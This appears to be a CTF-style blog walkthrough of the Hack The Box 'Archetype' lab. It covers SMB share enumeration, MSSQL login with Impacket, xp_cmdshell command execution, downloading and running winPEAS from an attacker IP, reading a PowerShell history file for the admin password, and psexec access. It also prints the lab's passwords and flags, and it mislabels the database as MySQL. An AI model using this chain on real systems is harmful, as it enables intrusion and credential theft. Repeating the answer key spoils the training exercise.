HTB Labs — Tier 2 — “Archetype” Machine Walkthrough | By: CyberAlp0

Hey Folks, this is CyberAlp0. Back again to a new walkthrough powered by HTB, Tier 1, named “Archetype”. This machine covers some tasks that will give you a walkthrough into finally finding the flag and solving the machine.
This blog will guide you toward solving the tasks one by one and give you a little bit more information and hints regarding each question. These hints will widen your experience and sharpen your mind.
Let’s begin Spawning…
Step 1: Connecting to the Starting Point Labs Servers.
To attack the target machine, you have to be on the same network. You can read my Blog which will guide you step-by-step into connecting to the target machine.
Step 2: Spawning the Machine and Start Solving the Tasks.
Task 1: Which TCP port is hosting the database server?
Answer: 1433
Walkthrough:
By Scanning the target first, we will have a pretty good knowledge about nearly everything in the machine. There are two different scanning tools, which are the Nmap & Rustscan.
Since Nmap is my favorite, I will be using it to see the open ports and what services are running.
nmap -v 10.129.95.187

You can also run the Nmap to detect the version names (-sV) and the default set of scripts (-sC).
nmap -sC -sV 10.129.95.187

You shall notice that the database used is MySQL database of version 2017. and it is operating on a TCP port 1433.
Note That: the Default TCP port for MySQL is 3306.
Task 2: What is the name of the non-administrative share available over SMB?
Answer: backups
Walkthrough:
Since the server has an open port of 445, this means that the server is likely vulnerable to the SMB “Server Message Block” which gives any attacker inside the network to scan and list for the shared files or devices such as printers.
To exploit this vulnerability, we will be typing the following command
smbclient -L 10.129.95.187

We will notice that there are 4 shares inside the server. All the shares that end with the “$” sign, mean that these are administrative shares. No one will be able to access or view what is inside them without permission. Hence, the only share that can be accessed without passwords is the “backups” share.
Note that : A share is a local resource on the server that is accessible to the SMB clients on the network. A share is a directory. It is used to provide a network access to the home directories on a network file server. Each user is assigned to a home directory.

We have Discussed more about the SMB in the “DANCE” Machine. You may find more information about exploiting SMB through this blog.
Task 3: What is the password identified in the file on the SMB share?
Answer: M3g4c0rp123
Walkthrough:
By making use of the available workshare named “backups”, we will exploit the opened port of 445 and connect & list the connected Shares/Devices in the network by typing the listing command using the smbclient.
smbclient --no-pass //10.129.95.187/backups

By making use of the GET command we will be able to download the file named as “prod.dtsconfig”. By viewing what’s inside this file we will be able to see that password.

Task 4: What script from Impacket collection can be used to establish an authenticated connection to a Microsoft SQL Server?
Answer: mssqlclient.py
Walkthrough:
First of all, we need to understand the meaning of the Impacket collection. Impacket collection is a set of scripts and libraries that are written in Python. Impacket collection provides a wide range of functionalities for working with network protocols, and penetration testing.
Impacket was developed by Core Security Technologies. These bunch of scripts and libraries allow users to interact with network services and perform security-related tasks like implementing network protocols like SMB, LDAP , and Kerberos.
Note that: Impacket scripts and libraries are open source and can be found in GitHub. But it is already preconfigured in your latest kali Linux.
In the Impact Collection, the script that will be used to establish authentication with the Microsoft SQL Database is “mssqlclient.py”. It is a Python script that allows connecting to a Microsoft SQL server and executing SQL queries.
impacket-mssqlclient <hostname/ID>@IP -windows-auth
You will find the hostname or the ID in the prod.dtsconfig. The ID=ARCHETYPE/sql_svc & The password=M3g4c0rp123

Connect to the server using the Impacket mssqlclient.py command as follows:
impacket-mssqlclient ARCHETYPE/sql_srv@10.129.138.22 -windows-auth
You will be asked to enter the password, just copy and paste the password and press enter.

Task 5: What extended stored procedure of Microsoft SQL Server can be used to spawn a Windows command shell?
Answer: xp_cmdshell
Walkthrough:
In Microsoft SQL Server, the extended stored procedure that can be used to spawn a Windows command shell is called “xp_cmdshell”.
What is meant by an extended stored procedure?
It is a feature in Microsoft SQL Server that allows the users to create and execute functions. These Functions take part in extending the functionality of SQL server by integrating other programming codes like C# & C++
“xp_cmdshell” is considered one of these built-in extended stored procedures. It gives you the ability to execute commands on the operating system level from the SQL server itself. it gives you also the ability to interact with the Windows Command Line CMD and execute commands.
Bottom of line: xp_cmdshell is a stored procedure feature inside SQL servers. when using it, it will be like a channel between you and the windows operating system. You will be able to execute windows power shell commands through it.

To make use of the xp_cmdshell, You will be prompted to enable the feature. Enabling it will give you the ability to execute commands on the OS level.
enable_xp_cmdshell

To make sure everything works fine, try to execute a windows shell command like whoami and see the result.

Task 6: What script can be used to search possible paths to escalate privileges on Windows hosts?
Answer: winPEAS
Walkthrough:
When Executing the “whoami” command using the xp_cmdshell, we have realized that we are logged in as a normal user. Thus, we need to escalate the privileges from a normal user to a more powerful user.
Walkthrough into using winPEAS for escalating privileges:
Firstly: Download the Windows Privilege escalation awesome scripts (winPEAS) through this link on GitHub. Install it as shown in the following screenshot.

You can download the release pages that contains the winPEAS script that will be transferred and executed to the target machine through this link.

Secondly: Transfer WinPEASx64.exe to the target machine
WinPEAS.exe is a script that is used to escalate the privileges from normal users to admin users. Thus, we will be trying to move this script to the target machine and execute this script to escalate the privileges.
By using the wget command to download the script, we can move this script to the Apache2 server of the Kali Linux that is located in the following path /var/www/html.


Now, the script can be downloaded through typing the following link in any browser http://10.10.14.66/winPEASx64.exe
We will use the xp_cmdshell to upload the script using the PowerShell into the target machine. Then, we will use the PowerShell to execute this script.
Thirdly: Use xp_cmdshell to download the script on the target machine and execute it.
Step 1: Printing the Working Directory
xp_cmdshell "powershell -c pwd"

Step 2: Listing what’s inside the Directory C:/Users/public
xp_cmdshell "powershell -c dir C:/Users/Public"

Step 3: Downloading the winPEASx64.exe using the PowerShell
xp_cmdshell "powershell -c cd C:/Users/Public; wget http://10.10.14.66/winPEASx64.exe"

You will notice the following error “NotSupportedException”:
wget : The response content cannot be parsed because the Internet Explorer engine is not available, or Internet
Explorer’s first-launch configuration is not complete. Specify the UseBasicParsing parameter and try again.
To solve this issue, You will have to specify the output for the script that will be downloaded, along with its extension.
xp_cmdshell "powershell -c cd C:/Users/Public; wget http://10.10.14.66/winPEASx64.exe -o winPEASx64.exe"


Step 4: Executing the Script to escalate the privileges “ApplicationFailedException”
Write the following command in order to execute the winPEASx64.exe
xp_cmdshell "powershell -c cd C:/Users/Public; ./winPEASx64.exe"
You shall encounter an error stats that the script “winPEASx64.exe” is not valid application for the OS platform. This can be solved by downloading the other version of winPEAS.exe which is x86.

x86 can be executed in both OS architectures (x64 & x86). You shall find the x86 version through this link.

Step 5: Downloading the x86 based script on the target machine
After following the last steps in downloading the x86 version of the winPEAS, we will download the script using the following command on the target machine.
xp_cmdshell "powershell -c C:/Users/Public/; wget http://10.10.14.66/winPEASx86.exe -o winPEASx86.exe"


Step 6: Executing the x86-based script on the target machine
Type the following command line to execute the winPEASx86.exe in the target machine and escalate the privileges. You shall find the result of the execution process in the previous screenshot.
xp_cmdshell "powershell -c cd C:/Users/Public; ./winPEASx86.exe"


We shall find that the path of the file that contains the administrator password is:
C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt.
Task 7: What file contains the administrator’s password?
Answer: ConsoleHost_history.txt
Walkthrough:
By typing the following command, we will be able to list the contents of the text file that contains the admin’s password
xp_cmdshell "powershell -c cd C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\; type ConsoleHost_history.txt"
Or we can directly type the following
xp_cmdshell "powershell -c type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"

The password of the admin is MEGACORP_4dm1n!!
Task 8: Submitting the user flag
Answer: 3e7b102e78218e935bf3f4951fec21a3
Walkthrough:
Again, we will get the help of the Impacket features. we will use a specific Python tool called “psexec” to gain access as an administrator and cat the contents or the user flag.
impacket-psexec Administrator@10.129.70.21

Navigate into the following path to fetch what’s inside the user flag
type C:/Users/sql_svc/Desktop/user.txt

You will find the user.txt, once you type it, you will find that the user flag is
3e7b102e78218e935bf3f4951fec21a3
Task 9: Submitting the root flag
Answer: b91ccec3305e98240082d4474b848528
Walkthrough:
You shall find the root flag in the Desktop of the administrator in the following path C:\Users\Adminsitrator\Desktop\root.txt

The Root Flag of the Archetype Machine is: b91ccec3305e98240082d4474b848528
Hope you enjoyed reading my blog about solving Archetype machine from HTB — Tier 2— Starting Point Phase.
See You in another write-up!